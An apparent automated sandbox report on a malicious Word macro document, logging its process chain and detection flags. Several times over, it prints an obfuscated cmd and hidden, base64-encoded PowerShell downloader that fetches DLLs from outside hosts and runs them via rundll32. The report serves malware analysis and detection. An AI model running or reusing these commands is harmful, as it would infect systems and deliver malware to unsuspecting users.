Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Bestellung.doc Stream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk Name: Jlzk8qsqcshl6jk
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwA